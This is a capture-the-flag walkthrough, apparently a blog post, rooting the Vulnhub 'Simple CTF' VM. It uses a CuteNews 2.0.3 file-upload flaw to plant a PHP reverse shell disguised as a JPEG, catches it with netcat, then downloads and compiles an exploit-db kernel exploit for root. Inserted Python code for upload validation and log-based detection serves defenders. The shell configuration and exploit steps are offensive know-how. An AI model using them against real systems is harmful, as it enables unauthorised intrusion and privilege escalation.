Simple CTF VM — Vulnhub.com

Netdiscover to find the IP of the box.

192.168.1.131 <- your IP will probably be different

nmap -T4 -A -v 192.168.1.131
80/tcp open http

Cool, so we've got one port open and it's HTTP on port 80, so let's jump over to Firefox and see what the website looks like.

Firefox 192.168.1.131:80

We are brought to a web page with the following text on it

Not much is given away at this stage, but let's make a note that it runs on CuteNews 2.0.3 and CutePHP (we can use this to search the exploit-db.com database).

Let's run Nikto on the site and see if we can gather any more info.

nikto -host 192.168.1.131
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.131
+ Target Hostname: 192.168.1.131
+ Target Port: 80
+ Start Time: 2016-07-27 14:27:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.6
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie CUTENEWS_SESSION created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0x47e 0x4ec3e1d077c80
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2016-07-27 14:28:06 (GMT-4) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

A few things to look at from the Nikto scan:

OSVDB-3268: /docs/: Directory indexing found.
OSVDB-3092: /LICENSE.txt: License file found may identify site software.
OSVDB-3233: /icons/README: Apache default file found.

Let's head over to exploit-db.com and see if we can use any of those vulnerabilities. Had a look around the site but nothing really jumped off the pages to me. There were mostly pages just referencing the OSVDB numbers and not actually how to implement them. (I'LL COME BACK TO THIS IF I CAN'T GET ACCESS ANY OTHER WAY)

While I am on the exploit-db site, let's see what comes back when we search for cutenews 2.0.3.

Boom!!! One exploit found: CuteNews 2.0.3 - Arbitrary File Upload (PHP)

CuteNews 2.0.3 Remote File Upload Vulnerability

Ok, so from what I understand of the exploit, I am going to have to upload a reverse shell PHP script disguised as a jpg and then use an app called Tamper Data to intercept the upload and change the file's extension back to php. Cool, ok.

I already have a reverse PHP shell script that I downloaded and modified for the Mr Robot VM, so I don't need to recreate a new one or download it again. I'll just make sure it has been updated with the new IP address so that it is calling home to the right address.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.131'; // CHANGE THIS TO YOUR CURRENT IP
$port = 2007; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

The script was originally downloaded from Pentestmonkey and can be found at http://pentestmonkey.net/tools/php-reverse-shell

Ok, so now that I have updated the IP address in the script, we need to save it with a jpg file extension.

We need to upload the jpg/php script using the avatar upload feature on the website.

Just before we do that we need to start the Tamper Data plugin so it's running and can watch as I upload the file.

So now that is running, let's upload the image as our avatar, and when Tamper Data sees it we can intercept the upload and change the file extension back to php from jpg.
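For the defender's side of this step, here is an added example (not from the write-up and not CuteNews code) of the server-side check that would have stopped the upload: the client-supplied extension is only used to pick which magic bytes to expect, the body is scanned for a PHP open tag, and the stored name is chosen by the server instead of taken from the request. The filenames and sample bytes are constructed.

```python
import re
import secrets

# Allowed avatar extensions and the magic bytes a genuine file of that type
# starts with. The client-supplied extension is only used to pick an entry here.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# A PHP open tag anywhere in the body means the "image" is also a script.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def validate_avatar(client_name: str, data: bytes) -> tuple:
    """Return (accepted, detail). detail is the verified extension on success
    or the rejection reason on failure."""
    name = client_name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:   # no extension, or "x.php.jpg" style
        return False, "filename must be name.ext with exactly one extension"
    ext = parts[1]
    if ext not in IMAGE_MAGIC:            # e.g. the name rewritten to .php in transit
        return False, "extension .%s is not an allowed image type" % ext
    if not data.startswith(IMAGE_MAGIC[ext]):
        return False, "content does not match the declared image type"
    if PHP_TAG.search(data):
        return False, "image body contains a PHP open tag"
    return True, ext


def storage_name(ext: str, token: str = "") -> str:
    """Name chosen by the server: random token plus the verified extension.
    The client-supplied name never reaches the filesystem. `token` is only a
    hook so callers (and tests) can make the result deterministic."""
    return "%s.%s" % (token or secrets.token_hex(16), ext)


if __name__ == "__main__":
    # Constructed samples: a minimal JPEG header, and a PHP file named as a
    # JPEG, which is the disguise used in the write-up.
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
    php_as_jpg = b"<?php echo 'not an image'; ?>"
    for name, body in [("avatar.jpg", jpeg), ("shell.jpg", php_as_jpg),
                       ("shell.php", jpeg), ("poly.jpg", jpeg + b"<?php echo 1; ?>")]:
        print(name, validate_avatar(name, body))
```

Storing the file outside the web root, or disabling script execution in the upload directory, is the other half of the fix; the check above only controls what gets written.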

Back in the terminal we need to start a netcat listener for when we trigger our php script to call home.

root@kali:~# nc -l -p 2007

(So after a few attempts and a bit of Googling to see where CuteNews puts uploaded files) I navigated to http://192.168.1.131/uploads/

and found my script uploaded and waiting there.

Let's just click the link to run it and jump back to our terminal with netcat listening.

root@kali:~# nc -l -p 2007
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
 15:59:18 up 1:43, 0 users, load average: 0.00, 0.01, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
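The request that triggered the shell above is a script being served out of the upload directory, which is something an access log makes easy to spot. The following is an added detection example, not part of the original post: it reads Apache combined-format log lines and alerts on any script-like path under /uploads/, noting how many POSTs (the upload itself) the same client made earlier. The log lines and client addresses are constructed; only the /uploads/ path comes from the write-up.

```python
import re
from collections import defaultdict

# Apache "combined" access-log line. Everything after the size is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
UPLOAD_DIR = "/uploads/"        # where CuteNews put the avatar in the write-up
# Anything the PHP handler might execute, including "x.php.jpg" double extensions.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)


def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_execution(lines):
    """Alert on a script-like path requested from the upload directory. Each
    alert carries how many POSTs the same client made earlier in the log,
    since the upload that planted the file is itself a POST."""
    posts = defaultdict(int)
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST":
            posts[rec["ip"]] += 1
        path = rec["path"].split("?", 1)[0]
        if path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            alerts.append({"ip": rec["ip"], "time": rec["ts"], "path": path,
                           "status": rec["status"], "prior_posts": posts[rec["ip"]]})
    return alerts


# Constructed sample log: a browse, an avatar upload (POST), another user's
# genuine avatar being fetched, then the first client requesting a .php file
# out of the upload directory.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Jul/2016:15:58:40 -0400] "GET /index.php HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [27/Jul/2016:15:58:52 -0400] "POST /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [27/Jul/2016:15:59:01 -0400] "GET /uploads/avatar_bob.jpg HTTP/1.1" 200 9812 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [27/Jul/2016:15:59:18 -0400] "GET /uploads/avatar_rev.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in find_upload_execution(SAMPLE_LOG):
        print(alert)
```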

I love it when it all starts coming together; we are now connected to the VM in a terminal. Let's start having a look around.

$ whoami
www-data

So we're not root; let's see about escalating our privs.

$ su root
su: must be run from a terminal

(THIS IS THE SAME OUTPUT I HAD THE LAST TIME I USED THIS SCRIPT IN THE MR ROBOT VM)

The way I got round the error last time was to run the commands

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

which should upgrade my session into a full-blown terminal session

www-data@simple:/$

Now let's try and su into the root user

www-data@simple:/$ su root
Password:

(Ok, so that didn't quite work to plan haha) it was worth a try though.

Let's carry on looking around the box to see what we can find.

First let's find out what version of Linux we are dealing with

cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.2 LTS"
NAME="Ubuntu"
VERSION="14.04.2 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.2 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

So it's an Ubuntu box running 14.04.2; let's see if we can find any exploits on exploit-db.

There were a few, and after trying some of them without any success I got to this one

https://www.exploit-db.com/exploits/37292/

Let's navigate to the tmp folder and try to download the exploit.

cd /tmp

www-data@simple:/tmp$ wget https://exploit-db.com/download/37292
--2016-07-28 07:51:03--  https://exploit-db.com/download/37292
Resolving exploit-db.com (exploit-db.com)... 192.124.249.8
Connecting to exploit-db.com (exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://www.exploit-db.com/download/37292 [following]
--2016-07-28 07:51:04--  https://www.exploit-db.com/download/37292
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [application/txt]
Saving to: '37292'

100%[======================================>] 5,123

Success!!!

www-data@simple:/tmp$ ls
37292 asdf.py

Ok, so we have the exploit loaded onto the box, but we need to compile it and change the permissions before it will run, so we can use the following commands

www-data@simple:/tmp$ mv 37292 37292.c

www-data@simple:/tmp$ gcc 37292.c -o pwnd

www-data@simple:/tmp$ ls
37292.c asdf.py pwnd

www-data@simple:/tmp$ chmod +x pwnd

www-data@simple:/tmp$ ls
37292.c asdf.py pwnd

www-data@simple:/tmp$ ./pwnd

spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library

That's it, the exploit has run; let's see if it has worked.

# whoami
root

BOOM!!!! We're now logged in as root. Let's just go straight for the flag.

# cd /root
# ls
flag.txt

# cat flag.txt

That’s it, completed another CTF challenge. This one was a nice little VM with some tricky but really fun steps. This is my 5th VM now and I really feel that things are starting to come together. I’m finding that I don’t have to rely so heavily on Google now and I’m pulling exploits and steps from previous experience. It felt like I spent more time doing this write up than I actually spent hacking the box. On to the next one!!!

Thanks to Robert Winkel for creating this VM and, as always, to Vulnhub.com for hosting this and all the other amazing VMs.


Originally published at pentestingandctf.tumblr.com.